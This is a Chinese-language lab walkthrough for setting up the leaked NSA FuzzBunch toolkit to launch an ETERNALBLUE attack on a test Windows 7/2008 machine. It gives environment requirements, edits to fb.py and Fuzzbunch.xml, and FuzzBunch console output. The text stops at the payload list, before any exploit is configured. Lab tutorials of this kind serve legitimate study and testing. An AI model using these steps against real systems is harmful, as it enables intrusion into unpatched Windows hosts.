0x01 Download NSA工具包
攻击脚本需要32位的Python2.6环境,所以攻击机还需以下两个环境:
python-2.6.6.msi、pywin32-221.win32-py2.6.exe
0x02 修改NSA工具配置文件
- 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件
注释掉第72行代码#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
def load_plugins(fb):
fb.io.pre_input(None)
fb.io.print_msg("Loading Plugins")
fb.io.post_input()
addplugins(fb, "Exploit", EXPLOIT_DIR, EDFPlugin)
addplugins(fb, "Payload", PAYLOAD_DIR, EDFPlugin)
addplugins(fb, "Touch", TOUCH_DIR, EDFPlugin)
addplugins(fb, "ImplantConfig", IMPLANT_DIR, EDFPlugin)
#addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
addplugins(fb, "Special", SPECIAL_DIR, DAVEPlugin, DeployableManager)
- 修改C:\Users\Administrator\Desktop\shadowbroker-master\windows\Fuzzbunch.xml文件
修改第19行代码的Resources路径和第24行代码的logs路径,改成目前工具包存放的路径
<t:parameter name="ResourcesDir"
description="Absolute path of the Resources Directory"
type="String"
default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources"/>
<t:parameter name="LogDir"
description="Absolute path of an Initial Log Directory"
type="String"
default="C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs"/>
0x03 运行fb.py脚本实施ETERNALBLUE攻击
- 环境说明:
测试机 Windows 7/2008 10.130.3.246
攻击机 Windows 10 10.130.3.243
攻击机 Kali 10.130.3.242
- 运行fb.py文件实施Eternalblue攻击
运行C:\Users\Administrator\Desktop\shadowbroker-master\windows\fb.py文件
Microsoft Windows [版本 10.0.18363.1316]
(c) 2019 Microsoft Corporation。保留所有权利。
C:\Users\Administrator\Desktop\shadowbroker-master\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\Users\Administrator\Desktop\shadowbroker-master\windows\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
=========